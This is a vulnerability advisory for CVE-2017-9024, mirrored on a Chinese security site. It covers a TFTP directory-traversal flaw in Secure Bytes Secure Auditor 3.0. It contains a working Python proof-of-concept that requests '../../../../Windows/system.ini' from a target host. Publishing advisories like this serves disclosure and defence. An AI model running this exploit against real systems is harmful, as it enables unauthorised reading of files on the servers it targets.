首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Secure Auditor 3.0 - Directory Traversal
来源:hyp3rlinx.altervista.org 作者:hyp3rlinx 发布时间:2017-05-22  
[+] Credits: John Page aka HYP3RLINX   
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec           
 
 
 
Vendor:
====================
www.secure-bytes.com
 
 
 
Product:
=====================
Secure Auditor - v3.0
 
Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.
 
 
 
Vulnerability Type:
===================
Directory Traversal
 
 
 
CVE Reference:
==============
CVE-2017-9024
 
 
 
Security Issue:
================
Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.
 
 
 
 
Exploit/POC:
=============
import sys,socket
 
print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'
 
HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69                                       
 
PAYLOAD = "\x00\x01"                #TFTP Read
PAYLOAD += FILE+"\x00"              #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"           #TFTP Type
 
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()
 
print "Victim Data located on : %s " %(HOST)
print out.strip()
 
 
 
Network Access:
===============
Remote
 
 
 
 
Severity:
=========
High
 
 
 
Disclosure Timeline:
==================================
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure
 
 
 
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
 
hyp3rlinx
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sure Thing Disc Labeler 6.2.13
·Mantis Bug Tracker 1.3.10/2.3.
·Microsoft Windows Windows 7/20
·Pegasus 4.72 Build 572 Remote
·Microsoft Windows Windows 8/20
·VMware Workstation for Linux 1
·Oracle PeopleSoft - XML Extern
·Linux Kernel 4.11 - eBPF Verif
·BuilderEngine 3.5.0 - Arbitrar
·MediaWiki SyntaxHighlight Exte
·WordPress PHPMailer 4.6 - Host
·Sync Breeze Enterprise GET Buf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved